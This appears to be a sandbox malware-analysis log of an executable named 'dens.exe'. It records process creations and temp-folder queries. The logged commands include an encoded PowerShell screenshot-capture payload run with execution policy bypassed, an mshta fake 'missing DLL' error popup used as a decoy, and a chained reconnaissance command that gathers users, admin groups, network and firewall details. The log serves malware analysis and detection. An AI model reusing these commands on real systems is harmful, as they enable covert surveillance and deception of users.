            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C119570 cpuid 0_2_00007FF62C119570
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\attrs-24.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\attrs-24.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\attrs-24.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info\license_files VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\autocommand-2.2.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\autocommand-2.2.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
